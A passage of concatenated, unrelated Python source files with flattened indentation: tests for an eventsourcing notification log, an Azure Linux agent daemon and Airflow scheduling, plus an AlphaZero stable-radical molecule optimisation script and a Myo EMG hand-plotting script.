with self.assertRaises(StopIteration):
next(reader)
class TestRemoteNotificationLog(NotificationLogTestCase):
use_named_temporary_file = True
def test_remote_notification_log(self):
num_notifications = 42
section_size = 5
# Build a notification log (fixture).
self.append_notifications(num_notifications)
# Start a simple server.
from wsgiref.util import setup_testing_defaults
from wsgiref.simple_server import make_server
port = 8080
base_url = "http://127.0.0.1:{}/notifications/".format(port)
def simple_app(environ, start_response):
"""Simple WSGI application."""
setup_testing_defaults(environ)
# Identify log and section from request.
path_info = environ["PATH_INFO"]
try:
section_id = path_info.strip("/").split("/")[-1]
except ValueError:
# Start response.
status = "404 Not Found"
headers = [("Content-type", "text/plain; charset=utf-8")]
start_response(status, headers)
return []
# Select the notification log.
notification_log = self.create_notification_log(section_size)
# Get serialized section.
json_encoder = ObjectJSONEncoder()
view = NotificationLogView(notification_log, json_encoder)
resource = view.present_resource(section_id)
# Todo: Maybe redirect if the section ID is a mismatch, so
# the URL is good for cacheing.
# Start response.
status = "200 OK"
headers = [("Content-type", "text/plain; charset=utf-8")]
start_response(status, headers)
# Return a list of lines.
return [resource]
httpd = make_server("", port, simple_app)
print("Serving on port {}...".format(port))
thread = Thread(target=httpd.serve_forever)
thread.setDaemon(True)
thread.start()
try:
# Use reader with client to read all items in remote feed after item 5.
notification_log = RemoteNotificationLog(base_url)
# Just before we start, test the deserialise_section_size exceptions.
notification_log.deserialize_section_size("1")
with self.assertRaises(ValueError):
notification_log.deserialize_section_size('"1')
with self.assertRaises(TypeError):
notification_log.deserialize_section_size('"1"')
# Get all the items.
notification_log_reader = NotificationLogReader(
notification_log=notification_log
)
items_from_start = notification_log_reader.list_notifications()
# Check we got all the items.
self.assertEqual(len(items_from_start), num_notifications)
self.assertEqual(items_from_start[0]["id"], 1)
self.assertEqual(items_from_start[0]["state"], b"item1")
self.assertEqual(
items_from_start[0]["topic"],
"eventsourcing.domain.model.events#DomainEvent",
)
expected_section_count = ceil(num_notifications / float(section_size))
self.assertEqual(
notification_log_reader.section_count, expected_section_count
)
# Get all the items from item 5.
items_from_5 = list(notification_log_reader[section_size - 1 :])
# Check we got everything after item 5.
self.assertEqual(len(items_from_5), num_notifications - section_size + 1)
self.assertEqual(items_from_5[0]["id"], section_size)
self.assertEqual(
items_from_5[0]["topic"],
"eventsourcing.domain.model.events#DomainEvent",
)
self.assertEqual(
items_from_5[0]["state"], "item{}".format(section_size).encode("utf8")
)
expected_section_count = ceil(num_notifications / float(section_size))
self.assertEqual(
notification_log_reader.section_count, expected_section_count
)
# Check ValueError is raised for deserialization errors.
with self.assertRaises(ValueError):
notification_log.deserialize_section("invalid json")
finally:
httpd.shutdown()
thread.join()
httpd.server_close()
class TestNotificationLogWithDjango(DjangoTestCase, TestNotificationLog):
pass
class TestBigArrayNotificationLogWithDjango(
DjangoTestCase, TestBigArrayNotificationLog
):
pass
class TestBigArrayNotificationLogWithCassandra(
WithCassandraRecordManagers, TestBigArrayNotificationLog
):
pass
|
test_daemon.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import unittest
from multiprocessing import Process
import azurelinuxagent.common.conf as conf
from azurelinuxagent.daemon.main import OPENSSL_FIPS_ENVIRONMENT, get_daemon_handler
from azurelinuxagent.pa.provision.default import ProvisionHandler
from tests.tools import AgentTestCase, Mock, patch
class MockDaemonCall(object):
def __init__(self, daemon_handler, count):
self.daemon_handler = daemon_handler
self.count = count
def __call__(self, *args, **kw):
self.count = self.count - 1
# Stop daemon after restarting for n times
if self.count <= 0:
self.daemon_handler.running = False
raise Exception("Mock unhandled exception")
class TestDaemon(AgentTestCase):
@patch("time.sleep")
def test_daemon_restart(self, mock_sleep):
# Mock daemon function
daemon_handler = get_daemon_handler()
mock_daemon = Mock(side_effect=MockDaemonCall(daemon_handler, 2))
daemon_handler.daemon = mock_daemon
daemon_handler.check_pid = Mock()
daemon_handler.run()
mock_sleep.assert_any_call(15)
self.assertEqual(2, daemon_handler.daemon.call_count)
@patch("time.sleep")
@patch("azurelinuxagent.daemon.main.conf")
@patch("azurelinuxagent.daemon.main.sys.exit")
def test_check_pid(self, mock_exit, mock_conf, _):
daemon_handler = get_daemon_handler()
mock_pid_file = os.path.join(self.tmp_dir, "pid")
mock_conf.get_agent_pid_file_path = Mock(return_value=mock_pid_file)
daemon_handler.check_pid()
self.assertTrue(os.path.isfile(mock_pid_file))
daemon_handler.check_pid()
mock_exit.assert_any_call(0)
@patch("azurelinuxagent.daemon.main.DaemonHandler.check_pid")
@patch("azurelinuxagent.common.conf.get_fips_enabled", return_value=True)
def test_set_openssl_fips(self, _, __):
daemon_handler = get_daemon_handler()
daemon_handler.running = False
with patch.dict("os.environ"):
daemon_handler.run()
self.assertTrue(OPENSSL_FIPS_ENVIRONMENT in os.environ)
self.assertEqual('1', os.environ[OPENSSL_FIPS_ENVIRONMENT])
@patch("azurelinuxagent.daemon.main.DaemonHandler.check_pid")
@patch("azurelinuxagent.common.conf.get_fips_enabled", return_value=False)
def test_does_not_set_openssl_fips(self, _, __):
daemon_handler = get_daemon_handler()
daemon_handler.running = False
with patch.dict("os.environ"):
daemon_handler.run()
self.assertFalse(OPENSSL_FIPS_ENVIRONMENT in os.environ)
@patch('azurelinuxagent.common.conf.get_provisioning_agent', return_value='waagent')
@patch('azurelinuxagent.ga.update.UpdateHandler.run_latest')
@patch('azurelinuxagent.pa.provision.default.ProvisionHandler.run')
def test_daemon_agent_enabled(self, patch_run_provision, patch_run_latest, gpa): # pylint: disable=unused-argument
"""
Agent should run normally when no disable_agent is found
"""
with patch('azurelinuxagent.pa.provision.get_provision_handler', return_value=ProvisionHandler()):
# DaemonHandler._initialize_telemetry requires communication with WireServer and IMDS; since we
# are not using telemetry in this test we mock it out
with patch('azurelinuxagent.daemon.main.DaemonHandler._initialize_telemetry'):
self.assertFalse(os.path.exists(conf.get_disable_agent_file_path()))
daemon_handler = get_daemon_handler()
def stop_daemon(child_args): # pylint: disable=unused-argument
daemon_handler.running = False
patch_run_latest.side_effect = stop_daemon
daemon_handler.run()
self.assertEqual(1, patch_run_provision.call_count)
self.assertEqual(1, patch_run_latest.call_count)
@patch('azurelinuxagent.common.conf.get_provisioning_agent', return_value='waagent')
@patch('azurelinuxagent.ga.update.UpdateHandler.run_latest', side_effect=AgentTestCase.fail)
@patch('azurelinuxagent.pa.provision.default.ProvisionHandler.run', side_effect=ProvisionHandler.write_agent_disabled)
def test_daemon_agent_disabled(self, _, patch_run_latest, gpa): # pylint: disable=unused-argument
"""
Agent should provision, then sleep forever when disable_agent is found
"""
with patch('azurelinuxagent.pa.provision.get_provision_handler', return_value=ProvisionHandler()):
# file is created by provisioning handler
self.assertFalse(os.path.exists(conf.get_disable_agent_file_path()))
daemon_handler = get_daemon_handler()
# we need to assert this thread will sleep forever, so fork it
daemon = Process(target=daemon_handler.run)
daemon.start()
daemon.join(timeout=5)
self.assertTrue(daemon.is_alive())
daemon.terminate()
# disable_agent was written, run_latest was not called
self.assertTrue(os.path.exists(conf.get_disable_agent_file_path()))
self.assertEqual(0, patch_run_latest.call_count)
if __name__ == '__main__':
unittest.main()
|
stable_radical_opt_from_initial_center.py
|
import argparse
import logging
import os
import pathlib
import sys
from typing import Tuple
import numpy as np
import pandas as pd
import rdkit
from rdkit import Chem
from sqlalchemy import create_engine
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
run_id = 'stable_radical_optimization_psj_NS_l2'
def construct_problem(stability_model: pathlib.Path, redox_model: pathlib.Path, bde_model: pathlib.Path, **kwargs):
# We have to delay all importing of tensorflow until the child processes launch,
# see https://github.com/tensorflow/tensorflow/issues/8220. We should be more careful about where / when we
# import tensorflow, especially if there's a chance we'll use tf.serving to do the policy / reward evaluations on
# the workers. Might require upstream changes to nfp as well.
from rlmolecule.tree_search.reward import RankedRewardFactory
from rlmolecule.molecule.molecule_state import MoleculeState
from rlmolecule.molecule.molecule_problem import MoleculeTFAlphaZeroProblem
from rlmolecule.tree_search.metrics import collect_metrics
from examples.stable_radical_optimization.stable_radical_molecule_state import MoleculeBuilderProtectRadical
import tensorflow as tf
# TODO update/incorporate this code
sys.path.append('/projects/rlmolecule/pstjohn/models/20201031_bde/')
from preprocess_inputs import preprocessor as bde_preprocessor
bde_preprocessor.from_json('/projects/rlmolecule/pstjohn/models/20201031_bde/preprocessor.json')
# TODO make this into a command-line argument(?)
# or just store it in this directory
# bde_preprocessor = preprocessor.load_preprocessor(saved_preprocessor_file="/projects/rlmolecule/pstjohn/models/20201031_bde/preprocessor.json")
@tf.function(experimental_relax_shapes=True)
def predict(model: 'tf.keras.Model', inputs):
return model.predict_step(inputs)
class StableRadOptProblem(MoleculeTFAlphaZeroProblem):
def __init__(self, engine: 'sqlalchemy.engine.Engine', builder: 'MoleculeBuilder',
stability_model: 'tf.keras.Model', redox_model: 'tf.keras.Model', bde_model: 'tf.keras.Model',
**kwargs) -> None:
self.engine = engine
self._builder = builder
self.stability_model = stability_model
self.redox_model = redox_model
self.bde_model = bde_model
super(StableRadOptProblem, self).__init__(engine, builder, **kwargs)
def get_initial_state(self) -> MoleculeState:
return MoleculeState(rdkit.Chem.MolFromSmiles('S[NH]'), self._builder)
def get_reward(self, state: MoleculeState) -> Tuple[float, dict]:
# Node is outside the domain of validity
policy_inputs = self.get_policy_inputs(state)
if ((policy_inputs['atom'] == 1).any() | (policy_inputs['bond'] == 1).any()):
return 0.0, {'forced_terminal': False, 'smiles': state.smiles, 'status': 'outside_dov'}
if state.forced_terminal:
reward, stats = self.calc_reward(state)
stats.update({'forced_terminal': True, 'smiles': state.smiles})
return reward, stats
return 0.0, {'forced_terminal': False, 'smiles': state.smiles}
@collect_metrics
def calc_reward(self, state: MoleculeState) -> float:
"""
"""
model_inputs = {
key: tf.constant(np.expand_dims(val, 0))
for key, val in self.get_policy_inputs(state).items()
}
spins, buried_vol = predict(self.stability_model, model_inputs)
spins = spins.numpy().flatten()
buried_vol = buried_vol.numpy().flatten()
atom_index = int(spins.argmax())
max_spin = spins[atom_index]
spin_buried_vol = buried_vol[atom_index]
atom_type = state.molecule.GetAtomWithIdx(atom_index).GetSymbol()
ionization_energy, electron_affinity = predict(self.redox_model, model_inputs).numpy().tolist()[0]
v_diff = ionization_energy - electron_affinity
bde, bde_diff = self.calc_bde(state)
ea_range = (-.5, 0.2)
ie_range = (.5, 1.2)
v_range = (1, 1.7)
bde_range = (60, 80)
# This is a bit of a placeholder; but the range for spin is about 1/50th that
# of buried volume.
reward = (
(1 - max_spin) * 50 + spin_buried_vol + 100 *
(self.windowed_loss(electron_affinity, ea_range) + self.windowed_loss(ionization_energy, ie_range) +
self.windowed_loss(v_diff, v_range) + self.windowed_loss(bde, bde_range)) / 4)
# the addition of bde_diff was to help ensure that
# the stable radical had the lowest bde in the molecule
# + 25 / (1 + np.exp(-(bde_diff - 10)))
stats = {
'max_spin': max_spin,
'spin_buried_vol': spin_buried_vol,
'ionization_energy': ionization_energy,
'electron_affinity': electron_affinity,
'bde': bde,
'bde_diff': bde_diff,
}
stats = {key: str(val) for key, val in stats.items()}
return reward, stats
def calc_bde(self, state: MoleculeState):
"""calculate the X-H bde, and the difference to the next-weakest X-H bde in kcal/mol"""
bde_inputs = self.prepare_for_bde(state.molecule)
# model_inputs = self.bde_get_inputs(state.molecule)
model_inputs = self.bde_get_inputs(bde_inputs.mol_smiles)
pred_bdes = predict(self.bde_model, model_inputs)
pred_bdes = pred_bdes[0][0, :, 0].numpy()
bde_radical = pred_bdes[bde_inputs.bond_index]
if len(bde_inputs.other_h_bonds) == 0:
bde_diff = 30. # Just an arbitrary large number
else:
other_h_bdes = pred_bdes[bde_inputs.other_h_bonds]
bde_diff = (other_h_bdes - bde_radical).min()
return bde_radical, bde_diff
def prepare_for_bde(self, mol: rdkit.Chem.Mol):
radical_index = None
for i, atom in enumerate(mol.GetAtoms()):
if atom.GetNumRadicalElectrons() != 0:
assert radical_index == None
is_radical = True
radical_index = i
atom.SetNumExplicitHs(atom.GetNumExplicitHs() + 1)
atom.SetNumRadicalElectrons(0)
break
radical_rank = Chem.CanonicalRankAtoms(mol, includeChirality=True)[radical_index]
mol_smiles = Chem.MolToSmiles(mol)
# TODO this line seems redundant
mol = Chem.MolFromSmiles(mol_smiles)
radical_index_reordered = list(Chem.CanonicalRankAtoms(mol, includeChirality=True)).index(radical_rank)
molH = Chem.AddHs(mol)
for bond in molH.GetAtomWithIdx(radical_index_reordered).GetBonds():
if 'H' in {bond.GetBeginAtom().GetSymbol(), bond.GetEndAtom().GetSymbol()}:
bond_index = bond.GetIdx()
break
h_bond_indices = [
bond.GetIdx() for bond in filter(
lambda bond: ((bond.GetEndAtom().GetSymbol() == 'H')
| (bond.GetBeginAtom().GetSymbol() == 'H')), molH.GetBonds())
]
other_h_bonds = list(set(h_bond_indices) - {bond_index})
return pd.Series({
'mol_smiles': mol_smiles,
'radical_index_mol': radical_index_reordered,
'bond_index': bond_index,
'other_h_bonds': other_h_bonds
})
def bde_get_inputs(self, mol_smiles):
""" The BDE model was trained on a different set of data
so we need to use corresponding preprocessor here
"""
inputs = bde_preprocessor.construct_feature_matrices(mol_smiles, train=False)
assert not (inputs['atom'] == 1).any() | (inputs['bond'] == 1).any()
return {key: tf.constant(np.expand_dims(val, 0)) for key, val in inputs.items()}
def windowed_loss(self, target: float, desired_range: Tuple[float, float]) -> float:
""" Returns 0 if the molecule is in the middle of the desired range,
scaled loss otherwise. """
span = desired_range[1] - desired_range[0]
lower_lim = desired_range[0] + span / 6
upper_lim = desired_range[1] - span / 6
if target < lower_lim:
return max(1 - 3 * (abs(target - lower_lim) / span), 0)
elif target > upper_lim:
return max(1 - 3 * (abs(target - upper_lim) / span), 0)
else:
return 1
stability_model = tf.keras.models.load_model(stability_model, compile=False)
redox_model = tf.keras.models.load_model(redox_model, compile=False)
bde_model = tf.keras.models.load_model(bde_model, compile=False)
builder = MoleculeBuilderProtectRadical(
max_atoms=15,
min_atoms=6,
# 4 for other radicals, for S[NH] we need to increase this to prevent early termination from high QED scores
tryEmbedding=True,
sa_score_threshold=4.,
stereoisomers=True,
atom_additions=('C', 'N', 'O', 'S'),
)
# engine = create_engine(f'sqlite:///stable_radical.db',
# connect_args={'check_same_thread': False},
# execution_options = {"isolation_level": "AUTOCOMMIT"})
dbname = "bde"
port = "5432"
host = "yuma.hpc.nrel.gov"
user = "rlops"
# read the password from a file
passwd_file = '/projects/rlmolecule/rlops_pass'
with open(passwd_file, 'r') as f:
passwd = f.read().strip()
drivername = "postgresql+psycopg2"
engine_str = f'{drivername}://{user}:{passwd}@{host}:{port}/{dbname}'
engine = create_engine(engine_str, execution_options={"isolation_level": "AUTOCOMMIT"})
reward_factory = RankedRewardFactory(engine=engine,
run_id=run_id,
reward_buffer_max_size=250,
reward_buffer_min_size=50,
ranked_reward_alpha=0.75)
problem = StableRadOptProblem(
engine,
builder,
stability_model,
redox_model,
bde_model,
run_id=run_id,
reward_class=reward_factory,
features=64,
num_heads=4, # Number of attention heads
num_messages=3,
batch_size=32,
max_buffer_size=256,
min_buffer_size=128, # Don't start training the model until this many games have occurred
policy_checkpoint_dir=os.path.join('policy_checkpoints', run_id))
return problem
def run_games(**kwargs):
from rlmolecule.alphazero.alphazero import AlphaZero
dirichlet_alpha = 1.0
dirichlet_x = 0.5
game = AlphaZero(
construct_problem(**kwargs),
dirichlet_alpha=dirichlet_alpha,
dirichlet_x=dirichlet_x,
)
while True:
path, reward = game.run(num_mcts_samples=500)
# logger.info(f'Game Finished -- Reward {reward.raw_reward:.3f} -- Final state {path[-1][0]}')
logger.info(f'Game Finished -- Reward {reward.raw_reward:.3f} -- Final state {path[-1][0]}')
def train_model(**kwargs):
construct_problem(**kwargs).train_policy_model(steps_per_epoch=100, game_count_delay=20, verbose=2)
def setup_argparser():
parser = argparse.ArgumentParser(
description='Optimize stable radicals to work as both the anode and caathode of a redox-flow battery.')
parser.add_argument('--train-policy',
action="store_true",
default=False,
help='Train the policy model only (on GPUs)')
parser.add_argument('--rollout',
action="store_true",
default=False,
help='Run the game simulations only (on CPUs)')
# '/projects/rlmolecule/pstjohn/models/20210214_radical_stability_new_data/',
parser.add_argument('--stability-model',
'-S',
type=pathlib.Path,
required=True,
help='Radical stability model for computing the electron spin and buried volume')
# '/projects/rlmolecule/pstjohn/models/20210214_redox_new_data/',
parser.add_argument('--redox-model',
'-R',
type=pathlib.Path,
required=True,
help='Redox model for computing the ionization_energy and electron_affinity')
# '/projects/rlmolecule/pstjohn/models/20210216_bde_new_nfp/',
parser.add_argument('--bde-model',
'-B',
type=pathlib.Path,
required=True,
help='BDE model for computing the Bond Dissociation Energy')
return parser
if __name__ == "__main__":
parser = setup_argparser()
args = parser.parse_args()
kwargs = vars(args)
if args.train_policy:
train_model(**kwargs)
elif args.rollout:
# make sure the rollouts do not use the GPU
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
run_games(**kwargs)
else:
print("Must specify either --train-policy or --rollout")
# else:
# jobs = [multiprocessing.Process(target=monitor)]
# jobs[0].start()
# time.sleep(1)
# for i in range(5):
# jobs += [multiprocessing.Process(target=run_games)]
# jobs += [multiprocessing.Process(target=train_model)]
# for job in jobs[1:]:
# job.start()
# for job in jobs:
# job.join(300)
|
lerp_finger_from_myo.py
|
import multiprocessing
import re
from pyomyo import Myo, emg_mode
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
import bone
import serial_utils as s
# Use device manager to find the Arduino's serial port.
COM_PORT = "COM9"
RESET_SCALE = True
LEGACY_DECODE = False # If false, will use alpha encodings
q = multiprocessing.Queue()
# Plot Setup
fig = plt.figure("Finger plots from Myo")
ax = fig.add_subplot(111, projection='3d')
plt.subplots_adjust(left=0.25, bottom=0.25)
ax.set_xlabel('X [m]')
ax.set_ylabel('Y [m]')
ax.set_zlabel('Z [m]')
# ------------ Myo Setup ---------------
def emg_worker(q):
m = Myo(mode=emg_mode.PREPROCESSED)
m.connect()
def add_to_queue(emg, movement):
q.put(emg)
m.add_emg_handler(add_to_queue)
def print_battery(bat):
print("Battery level:", bat)
m.add_battery_handler(print_battery)
# Green logo and bar LEDs
m.set_leds([0, 128, 0], [0, 128, 0])
# Vibrate to know we connected okay
m.vibrate(1)
"""worker function"""
while True:
m.run()
print("Worker Stopped")
def emg_to_fingers(emg):
'''
Take in 8 channel array for emg
return 5 array, 1 number for each finger
'''
# Create a mapping between channel and finger
thumb_val = emg[2]
index_val = emg[4]
middle_val = emg[6]
ring_val = emg[7]
pinky_val = emg[0]
# Scale the values assuming emg mode is preprocessing
thumb_val = thumb_val / 1024
index_val = index_val / 1024
middle_val = middle_val / 1024
ring_val = ring_val / 1024
pinky_val = pinky_val / 1024
fingers = [thumb_val, index_val, middle_val, ring_val, pinky_val]
return fingers
def animate(i):
fingers = [0,0,0,0,0]
emgs = [0,0,0,0,0,0,0,0]
while not(q.empty()):
emgs = list(q.get())
# Plot
ax.clear()
ax.set_xlabel('X [mm]')
ax.set_ylabel('Y [mm]')
ax.set_zlabel('Z [mm]')
if (RESET_SCALE == True):
ax.set_xlim3d([-0.05, 0.1])
ax.set_ylim3d([-0.1, 0.1])
ax.set_zlim3d([0, 0.2])
# Convert emg to finger lerp values:
fingers = emg_to_fingers(emgs)
# Lerp the right hand
points = bone.lerp_fingers(fingers, bone.right_open_pose, bone.right_fist_pose)
# Plot the Points
bone.plot_steam_hand(points, "Lerped Pose", ax)
if __name__ == "__main__":
p = multiprocessing.Process(target=emg_worker, args=(q,), daemon=True)
p.start()
anim = animation.FuncAnimation(fig, animate, blit=False, interval=1)
try:
plt.show()
except KeyboardInterrupt:
quit()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
NUM_EXAMPLE_DAGS = 18
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
configuration.conf.load_test_config()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
